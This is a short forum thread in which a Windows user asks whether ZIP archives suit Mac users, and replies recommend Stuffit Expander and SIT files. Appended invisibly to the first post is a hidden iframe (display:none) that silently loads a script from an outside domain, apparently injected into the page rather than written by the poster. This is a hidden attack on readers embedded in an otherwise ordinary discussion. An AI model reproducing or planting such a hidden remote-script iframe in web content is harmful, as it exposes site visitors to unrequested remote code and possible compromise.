Mac Users, archive format

Something occured to me this evening. I'm a Windoze guy, so this has not dawned on me before. If I post software to my website for download, are .ZIP formats any special problem for MAC users, or has ZIP become pretty popular there as well? If not, is there a better, more common format (stuffit or whatever) and is there a good Windows program that can make them?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

no, it's not a problem at all. we use Stuffit Expander by default, which handles zip files. Those of us who are running latest Mac OS, which is built on the Unix core "OS X" can handle sit., zip., tar., dmg. About the only thing we can't use is an exe. file. In which case we can boot up Virtual PC and run 95, 98, 2000, ME, XP on our Mac.

Agreed, if a Mac user wants to expand a ZIP file, we can use Stuffit Expander to unzip or we can use ZipIt to either ZIP or UNZIP.

However, if you want to make your files as Mac-friendly as possible, consider downloading Suffit from Alladin software to make SIT files. SIT is the defacto standard from the MacOS 9 days for Apple computers and some Mac-heads will not try a software compressed in another format.
